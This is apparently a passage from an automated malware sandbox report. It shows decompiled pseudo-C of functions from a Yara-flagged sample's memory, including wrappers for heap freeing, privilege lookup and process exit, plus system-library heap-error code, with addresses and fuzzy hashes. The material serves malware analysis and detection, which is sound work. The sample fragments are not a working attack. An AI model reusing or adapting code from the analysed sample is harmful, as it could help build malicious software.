					return E004199C0(_t17) + _t13 + 0x1000;
				}
			}










                                                                          0x00407263
                                                                          0x00407266
                                                                          0x00407269
                                                                          0x004072c1
                                                                          0x004072ce
                                                                          0x004072d3
                                                                          0x004072d8
                                                                          0x004072da
                                                                          0x004072dc
                                                                          0x004072dd
                                                                          0x004072ea
                                                                          0x004072ec
                                                                          0x004072ee
                                                                          0x0040730b
                                                                          0x0040730b
                                                                          0x0040730d
                                                                          0x00407312
                                                                          0x0040726b
                                                                          0x0040726b
                                                                          0x00407270
                                                                          0x00407276
                                                                          0x0040728d
                                                                          0x0040728d

                                                                          APIs
                                                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072EA
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.330534936.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: MessagePostThread
                                                                          • String ID:
                                                                          • API String ID: 1836367815-0
                                                                          • Opcode ID: 749bc22121e77259128f93e52fe50e44993650164536a24b41617dfcecaecc98
                                                                          • Instruction ID: 1cb0bc9abefd718b16f78df7f90def9a8a0c47b573ba1ac9723929d264b51e13
                                                                          • Opcode Fuzzy Hash: 749bc22121e77259128f93e52fe50e44993650164536a24b41617dfcecaecc98
                                                                          • Instruction Fuzzy Hash: 38F0E931F8422436F62156915C03FBB77589B40F11F1500AFFF04FA1C1E6A86D1146EA
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004188D2, Relevance: 1.5, APIs: 1, Instructions: 27memoryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 79%
                                                                          			E004188D2(void* __edx) {
				char _t11;
				void* _t18;

				asm("lodsb");
				_t8 =  *0x31509F29;
				_t3 = _t8 + 0xc74; // 0xc74
				E004191D0(_t18,  *0x31509F29, _t3,  *((intOrPtr*)( *0x31509F29 + 0x10)), 0, 0x35);
				_t11 = RtlFreeHeap( *0x31509F2D,  *0x31509F31,  *0x31509F35); // executed
				return _t11;
			}





                                                                          0x004188d4
                                                                          0x004188e3
                                                                          0x004188ef
                                                                          0x004188f7
                                                                          0x0041890d
                                                                          0x00418911

                                                                          APIs
                                                                          • RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041890D
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.330534936.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeHeap
                                                                          • String ID:
                                                                          • API String ID: 3298025750-0
                                                                          • Opcode ID: a5714ebab8deb8b1c59236b194988a56b3aa61742115e08ad9416fee8f5f815a
                                                                          • Instruction ID: 816756130b1cdfcc81e611f44ea3a86a64dc87f36b26cacacb23cb38dbaa69ca
                                                                          • Opcode Fuzzy Hash: a5714ebab8deb8b1c59236b194988a56b3aa61742115e08ad9416fee8f5f815a
                                                                          • Instruction Fuzzy Hash: 95E06DB56002057FE719DF95CC49E977798EF88350F008999FD1C5B651D630E860CBA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 004188E0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E004188E0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E004191D0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                          0x004188ef
                                                                          0x004188f7
                                                                          0x0041890d
                                                                          0x00418911

                                                                          APIs
                                                                          • RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041890D
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.330534936.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FreeHeap
                                                                          • String ID:
                                                                          • API String ID: 3298025750-0
                                                                          • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                          • Instruction ID: d5064c9333f2c86e90799a0952281b4505df08c213c274bd60dc18c3aad5e7c3
                                                                          • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                          • Instruction Fuzzy Hash: D6E012B1200208ABDB18EF99CC49EA777ACAF88750F018559FE085B242C630E910CAB0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00418A40, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00418A40(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E004191D0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                                          0x00418a5a
                                                                          0x00418a70
                                                                          0x00418a74

                                                                          APIs
                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A70
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.330534936.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: LookupPrivilegeValue
                                                                          • String ID:
                                                                          • API String ID: 3899507212-0
                                                                          • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                          • Instruction ID: 94a67e7d56b84cdac76e00d2984c4843b75a07e867f03accef92050f0623a7c7
                                                                          • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                          • Instruction Fuzzy Hash: 2AE01AB12002086BDB14DF49CC85EE737ADAF88650F018155FE0857241C934E8508BF5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00418920, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 100%
                                                                          			E00418920(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E004191D0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                                          0x00418923
                                                                          0x0041893a
                                                                          0x00418948

                                                                          APIs
                                                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418948
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.330534936.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ExitProcess
                                                                          • String ID:
                                                                          • API String ID: 621844428-0
                                                                          • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                          • Instruction ID: e5768b9f518b8de78fd4a208f412dfdc851767aa697c2aafb91b43477ac04d56
                                                                          • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                          • Instruction Fuzzy Hash: 99D012716002187BD624DB99CC89FD7779CDF48790F058065BA1C5B241C571BA00C6E1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00418913, Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 68%
                                                                          			E00418913(intOrPtr _a4, int _a8) {
				void* _t14;

				asm("cli");
				_t7 = _a4;
				E004191D0(_t14, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t7 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                                          0x00418913
                                                                          0x00418923
                                                                          0x0041893a
                                                                          0x00418948

                                                                          APIs
                                                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418948
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.330534936.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: ExitProcess
                                                                          • String ID:
                                                                          • API String ID: 621844428-0
                                                                          • Opcode ID: ba33f885d0767ed2361e370355fe500b5874024bd02dd801d8f9769f8848f774
                                                                          • Instruction ID: 8f18435794c1cf7a7ce09d533f79ea27bdc7dd8e2885380ac3afe72a2bc80574
                                                                          • Opcode Fuzzy Hash: ba33f885d0767ed2361e370355fe500b5874024bd02dd801d8f9769f8848f774
                                                                          • Instruction Fuzzy Hash: 8DE0C2741092022BD720CB248DC6F877BA4AF05300F28499EA8D85B143C278A64486A8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 011B967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID: InitializeThunk
                                                                          • String ID:
                                                                          • API String ID: 2994545307-0
                                                                          • Opcode ID: 9f3341bd712b9ad503e4e7acc4c644b60db108050b0d04e212d833844a258a6b
                                                                          • Instruction ID: c2d3aa048058810b9cbaa42fc4ad84076570c0b5d4bd4b5640d9e594eb3035d4
                                                                          • Opcode Fuzzy Hash: 9f3341bd712b9ad503e4e7acc4c644b60db108050b0d04e212d833844a258a6b
                                                                          • Instruction Fuzzy Hash: 70B09BF19014C5C5DB15D7A45748717790077D0745F26C066D2020681B4778C091F5F5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Non-executed Functions

                                                                          Function 0122B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          • This failed because of error %Ix., xrefs: 0122B446
                                                                          • an invalid address, %p, xrefs: 0122B4CF
                                                                          • The critical section is owned by thread %p., xrefs: 0122B3B9
                                                                          • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0122B476
                                                                          • The resource is owned shared by %d threads, xrefs: 0122B37E
                                                                          • The resource is owned exclusively by thread %p, xrefs: 0122B374
                                                                          • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0122B3D6
                                                                          • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0122B484
                                                                          • The instruction at %p tried to %s , xrefs: 0122B4B6
                                                                          • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0122B47D
                                                                          • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0122B2F3
                                                                          • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0122B314
                                                                          • *** Inpage error in %ws:%s, xrefs: 0122B418
                                                                          • The instruction at %p referenced memory at %p., xrefs: 0122B432
                                                                          • *** An Access Violation occurred in %ws:%s, xrefs: 0122B48F
                                                                          • *** Resource timeout (%p) in %ws:%s, xrefs: 0122B352
                                                                          • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0122B323
                                                                          • Go determine why that thread has not released the critical section., xrefs: 0122B3C5
                                                                          • *** enter .exr %p for the exception record, xrefs: 0122B4F1
                                                                          • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0122B38F
                                                                          • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0122B53F
                                                                          • a NULL pointer, xrefs: 0122B4E0
                                                                          • write to, xrefs: 0122B4A6
                                                                          • *** enter .cxr %p for the context, xrefs: 0122B50D
                                                                          • <unknown>, xrefs: 0122B27E, 0122B2D1, 0122B350, 0122B399, 0122B417, 0122B48E
                                                                          • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0122B305
                                                                          • read from, xrefs: 0122B4AD, 0122B4B2
                                                                          • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0122B2DC
                                                                          • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0122B39B
                                                                          • *** then kb to get the faulting stack, xrefs: 0122B51C
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                          • API String ID: 0-108210295
                                                                          • Opcode ID: d75b530fa8cb45eec3e65c7e8a60a4229a050d555bc88cfa16b010826cb4490d
                                                                          • Instruction ID: 7b4a88e2055d716f4d86b8fe41722757b68162f057f3c54990df4f89b4d8d07b
                                                                          • Opcode Fuzzy Hash: d75b530fa8cb45eec3e65c7e8a60a4229a050d555bc88cfa16b010826cb4490d
                                                                          • Instruction Fuzzy Hash: 5C812835A20221FFDF2A5F4ADC8AE7F3B29EF56A51F404148F6041B163D3A28421DB72
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01231C06, Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 44%
                                                                          			E01231C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x11548a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0117B150();
				} else {
					E0117B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x126589c);
				E0117B150("Heap error detected at %p (heap handle %p)\n",  *0x12658a0);
				_t27 =  *0x1265898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M01231E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0117B150();
				} else {
					E0117B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E0117B150("Error code: %d - %s\n",  *0x1265898);
				_t113 =  *0x12658a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0117B150();
					} else {
						E0117B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0117B150("Parameter1: %p\n",  *0x12658a4);
				}
				_t115 =  *0x12658a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0117B150();
					} else {
						E0117B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0117B150("Parameter2: %p\n",  *0x12658a8);
				}
				_t117 =  *0x12658ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0117B150();
					} else {
						E0117B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0117B150("Parameter3: %p\n",  *0x12658ac);
				}
				_t119 =  *0x12658b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0117B150();
					} else {
						E0117B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x12658b4);
					E0117B150("Last known valid blocks: before - %p, after - %p\n",  *0x12658b0);
				} else {
					_t120 =  *0x12658b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0117B150();
				} else {
					E0117B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E0117B150("Stack trace available at %p\n", 0x12658c0);
			}











                                                                          0x01231c10
                                                                          0x01231c16
                                                                          0x01231c1e
                                                                          0x01231c3d
                                                                          0x01231c3e
                                                                          0x01231c20
                                                                          0x01231c35
                                                                          0x01231c3a
                                                                          0x01231c44
                                                                          0x01231c55
                                                                          0x01231c5a
                                                                          0x01231c65
                                                                          0x01231c67
                                                                          0x00000000
                                                                          0x01231c6e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x01231c67
                                                                          0x01231cdc
                                                                          0x01231ce5
                                                                          0x01231d04
                                                                          0x01231d05
                                                                          0x01231ce7
                                                                          0x01231cfc
                                                                          0x01231d01
                                                                          0x01231d0b
                                                                          0x01231d17
                                                                          0x01231d1f
                                                                          0x01231d25
                                                                          0x01231d30
                                                                          0x01231d4f
                                                                          0x01231d50
                                                                          0x01231d32
                                                                          0x01231d47
                                                                          0x01231d4c
                                                                          0x01231d61
                                                                          0x01231d67
                                                                          0x01231d68
                                                                          0x01231d6e
                                                                          0x01231d79
                                                                          0x01231d98
                                                                          0x01231d99
                                                                          0x01231d7b
                                                                          0x01231d90
                                                                          0x01231d95
                                                                          0x01231daa
                                                                          0x01231db0
                                                                          0x01231db1
                                                                          0x01231db7
                                                                          0x01231dc2
                                                                          0x01231de1
                                                                          0x01231de2
                                                                          0x01231dc4
                                                                          0x01231dd9
                                                                          0x01231dde
                                                                          0x01231df3
                                                                          0x01231df9
                                                                          0x01231dfa
                                                                          0x01231e00
                                                                          0x01231e0a
                                                                          0x01231e13
                                                                          0x01231e32
                                                                          0x01231e33
                                                                          0x01231e15
                                                                          0x01231e2a
                                                                          0x01231e2f
                                                                          0x01231e39
                                                                          0x01231e4a
                                                                          0x01231e02
                                                                          0x01231e02
                                                                          0x01231e08
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x01231e08
                                                                          0x01231e5b
                                                                          0x01231e7a
                                                                          0x01231e7b
                                                                          0x01231e5d
                                                                          0x01231e72
                                                                          0x01231e77
                                                                          0x01231e95

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.331292284.0000000001150000.00000040.00000001.sdmp, Offset: 01150000, based on PE: true
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                          • API String ID: 0-2897834094
                                                                          • Opcode ID: 4fe91456506a4fd3f0345e730b6a1f22eacc743c861c9e4167500ece75d39e88
                                                                          • Instruction ID: df0f07b3cbb40ebacae3ec0dbbfa9e618ad977a77be471b43c2523e2b7f7bec6
                                                                          • Opcode Fuzzy Hash: 4fe91456506a4fd3f0345e730b6a1f22eacc743c861c9e4167500ece75d39e88
                                                                          • Instruction Fuzzy Hash: B161167A536185CFC219EB89F589E2073B8EB44930B1DC02AF9096B750E7618CA0CB1E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 01183D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 96%
                                                                          			E01183D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E01181B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L011977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E01181B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L011977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E01181B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E01181B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E01181B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L011977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L011977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L01194620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E011BF3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E011C1370(_t276, 0x1154e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E011BBB40(0,  &_v68, _t170);
									if(L011843C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L011977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L011977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E011BBB40(_t257,  &_v68, _t243);
								if(L011843C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E011C1370(_t278, 0x1154e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L01194620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E011BF3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E011C1370(_v16, 0x1154e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E011BBB40(_t262,  &_v68, _t244);
								if(L011843C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E011C1370(_t282, 0x1154e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E011BBB40(_t262,  &_v68, _t201);
							if(L011843C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L011977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L011977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L01194620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E011BF3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E011C1370(_t280, 0x1154e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E011BBB40(_t267,  &_v68, _t245);
							if(L011843C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E011C1370(_t284, 0x1154e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E011BBB40(_t267,  &_v68, _t224);
						if(L011843C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L011977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L011977F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
